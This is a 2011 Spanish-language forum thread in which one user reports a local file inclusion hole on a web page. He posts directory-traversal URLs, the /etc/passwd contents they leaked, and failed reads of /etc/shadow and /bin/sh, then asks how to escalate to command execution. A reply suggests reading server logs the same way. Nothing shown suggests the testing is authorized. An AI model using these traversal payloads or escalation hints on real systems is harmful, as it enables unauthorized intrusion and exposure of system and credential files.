Título: Ejecutar comandos desde lectura? Publicado por: EvilGoblin en 10 Febrero 2011, 17:42 pm Tengo lectura de archivos limitada en una pagina.
/index.php?mostrar=buscador.php /index.php?mostrar=../../../../../../../../../etc/passwd Código: root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/bin/sh bin:x:2:2:bin:/bin:/bin/sh sys:x:3:3:sys:/dev:/bin/sh sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/bin/sh man:x:6:12:man:/var/cache/man:/bin/sh lp:x:7:7:lp:/var/spool/lpd:/bin/sh mail:x:8:8:mail:/var/mail:/bin/sh news:x:9:9:news:/var/spool/news:/bin/sh /index.php?mostrar=../../../../../../../../../etc/shadow error... blah blah blah /index.php?mostrar=../../../../../../../../../bin/sh Código: Warning: Unexpected character in input: '' (ASCII=18) state=1 in /bin/dash on line 49 hay alguna forma de esto pasar a ejecutar comandos ? guardar archivos? o algo? ya probe encontrar otro error y aun no hay caso. Título: Re: Ejecutar comandos desde lectura? Publicado por: Garfield07 en 10 Febrero 2011, 19:27 pm Wow como se llamaba esta vulnerabilidad? Es que de exploiting web estoy sin blanca jaja...
Pues lo que podrías hacer sería leer algún log de ssh o demás a ver que ves... /index.php?mostrar=../../../../../../../../../var/log/XXX Mmm tengo curiosidad... Alguna otra idea? |